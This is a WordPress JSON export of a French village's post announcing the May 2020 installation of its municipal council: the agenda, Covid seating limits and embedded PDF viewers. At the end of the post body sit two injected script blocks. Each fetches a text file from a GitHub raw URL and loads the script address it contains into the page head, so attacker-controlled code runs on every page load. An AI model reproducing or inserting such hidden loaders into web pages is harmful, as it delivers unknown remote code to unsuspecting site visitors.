{"id":668,"date":"2020-05-25T17:26:00","date_gmt":"2020-05-25T15:26:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=668"},"modified":"2024-07-29T06:39:29","modified_gmt":"2024-07-29T04:39:29","slug":"installation-du-nouveau-conseil-municipal-24-mai-2020","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/","title":{"rendered":"Installation du nouveau Conseil Municipal 24 mai 2020"},"content":{"rendered":"\n<p>Ordre du jour&nbsp;:<\/p>\n\n\n\n<p>1. Installation du Conseil municipal \u00e9lu lors des \u00e9lections du 15 mars 2020<br>2. \u00c9lection du Maire<br>3. D\u00e9termination du nombre d\u2019adjoints<br>4. \u00c9lection des adjoints<br>5. Lecture de la charte de l\u2019\u00e9lu local<\/p>\n\n\n\n<p>Dans ce contexte particulier de lutte contre la propagation du Covid-19,&nbsp;<em>la s\u00e9ance du conseil municipal se tiendra avec un public restreint \u00e0 20 personnes hors conseillers municipaux et personnel communal.<\/em><\/p>\n\n\n\n<p>Les d\u00e9bats seront retransmis en direct sur la page Facebook de la commune&nbsp;:&nbsp;<a href=\"http:\/\/www.facebook.com\/mairie.haverskerque\">www.facebook.com\/mairie.haverskerque<\/a><\/p>\n\n\n\n<p>Des dispositions sanitaires et de distanciations sociales permettant le respect des gestes barri\u00e8res seront adopt\u00e9es.<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_2394\"  _slug=\"election-du-maire\" data-title=\"election-du-maire\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Election du maire<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2394 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/election_du_maire-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2391\"  _slug=\"determination-du-nombre-dadjoints\" data-title=\"determination-du-nombre-dadjoints\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9termination du nombre d\u2019adjoints<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2391 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/determination_du_nombre_d_adjoints-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2388\"  _slug=\"election-des-adjoints\" data-title=\"election-des-adjoints\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Election des adjoints<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2388 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/election_des_adjoints-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2385\"  _slug=\"lecture-de-la-charte-de-lelu-local\" data-title=\"lecture-de-la-charte-de-lelu-local\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Lecture de la Charte de l\u2019\u00e9lu local<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2385 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/lecture_de_la_charte_de_l_elu_local-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>Ordre du jour&nbsp;: 1. Installation du Conseil municipal \u00e9lu lors des \u00e9lections du 15 mars 20202. \u00c9lection du Maire3. D\u00e9termination du nombre d\u2019adjoints4. \u00c9lection des adjoints5. Lecture de la charte de l\u2019\u00e9lu local Dans ce contexte particulier de lutte contre la propagation du Covid-19,&nbsp;la s\u00e9ance du conseil municipal se tiendra avec un public restreint \u00e0 20 personnes hors conseillers municipaux et personnel communal. Les d\u00e9bats seront retransmis en direct sur la page Facebook de la commune&nbsp;:&nbsp;www.facebook.com\/mairie.haverskerque Des dispositions sanitaires et de distanciations sociales permettant le respect des gestes barri\u00e8res seront adopt\u00e9es.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-668","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Installation du nouveau Conseil Municipal 24 mai 2020 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Installation du nouveau Conseil Municipal 24 mai 2020 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"Ordre du jour&nbsp;: 1. Installation du Conseil municipal \u00e9lu lors des \u00e9lections du 15 mars 20202. \u00c9lection du Maire3. D\u00e9termination du nombre d\u2019adjoints4. \u00c9lection des adjoints5. Lecture de la charte de l\u2019\u00e9lu local Dans ce contexte particulier de lutte contre la propagation du Covid-19,&nbsp;la s\u00e9ance du conseil municipal se tiendra avec un public restreint \u00e0 20 personnes hors conseillers municipaux et personnel communal. Les d\u00e9bats seront retransmis en direct sur la page Facebook de la commune&nbsp;:&nbsp;www.facebook.com\/mairie.haverskerque Des dispositions sanitaires et de distanciations sociales permettant le respect des gestes barri\u00e8res seront adopt\u00e9es.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2020-05-25T15:26:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:39:29+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/05\\\/25\\\/installation-du-nouveau-conseil-municipal-24-mai-2020\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/05\\\/25\\\/installation-du-nouveau-conseil-municipal-24-mai-2020\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Installation du nouveau Conseil Municipal 24 mai 2020\",\"datePublished\":\"2020-05-25T15:26:00+00:00\",\"dateModified\":\"2024-07-29T04:39:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/05\\\/25\\\/installation-du-nouveau-conseil-municipal-24-mai-2020\\\/\"},\"wordCount\":116,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/05\\\/25\\\/installation-du-nouveau-conseil-municipal-24-mai-2020\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/05\\\/25\\\/installation-du-nouveau-conseil-municipal-24-mai-2020\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/05\\\/25\\\/installation-du-nouveau-conseil-municipal-24-mai-2020\\\/\",\"name\":\"Installation du nouveau Conseil Municipal 24 mai 2020 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/05\\\/25\\\/installation-du-nouveau-conseil-municipal-24-mai-2020\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/05\\\/25\\\/installation-du-nouveau-conseil-municipal-24-mai-2020\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2020-05-25T15:26:00+00:00\",\"dateModified\":\"2024-07-29T04:39:29+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/05\\\/25\\\/installation-du-nouveau-conseil-municipal-24-mai-2020\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/05\\\/25\\\/installation-du-nouveau-conseil-municipal-24-mai-2020\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/05\\\/25\\\/installation-du-nouveau-conseil-municipal-24-mai-2020\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Installation du nouveau Conseil Municipal 24 mai 2020\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Installation du nouveau Conseil Municipal 24 mai 2020 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/","og_locale":"fr_FR","og_type":"article","og_title":"Installation du nouveau Conseil Municipal 24 mai 2020 * Haverskerque, 100% Nature !*","og_description":"Ordre du jour&nbsp;: 1. Installation du Conseil municipal \u00e9lu lors des \u00e9lections du 15 mars 20202. \u00c9lection du Maire3. D\u00e9termination du nombre d\u2019adjoints4. \u00c9lection des adjoints5. Lecture de la charte de l\u2019\u00e9lu local Dans ce contexte particulier de lutte contre la propagation du Covid-19,&nbsp;la s\u00e9ance du conseil municipal se tiendra avec un public restreint \u00e0 20 personnes hors conseillers municipaux et personnel communal. Les d\u00e9bats seront retransmis en direct sur la page Facebook de la commune&nbsp;:&nbsp;www.facebook.com\/mairie.haverskerque Des dispositions sanitaires et de distanciations sociales permettant le respect des gestes barri\u00e8res seront adopt\u00e9es.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2020-05-25T15:26:00+00:00","article_modified_time":"2024-07-29T04:39:29+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Installation du nouveau Conseil Municipal 24 mai 2020","datePublished":"2020-05-25T15:26:00+00:00","dateModified":"2024-07-29T04:39:29+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/"},"wordCount":116,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/","name":"Installation du nouveau Conseil Municipal 24 mai 2020 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2020-05-25T15:26:00+00:00","dateModified":"2024-07-29T04:39:29+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/05\/25\/installation-du-nouveau-conseil-municipal-24-mai-2020\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Installation du nouveau Conseil Municipal 24 mai 2020"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/668","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=668"}],"version-history":[{"count":4,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/668\/revisions"}],"predecessor-version":[{"id":8317,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/668\/revisions\/8317"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=668"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=668"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=668"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}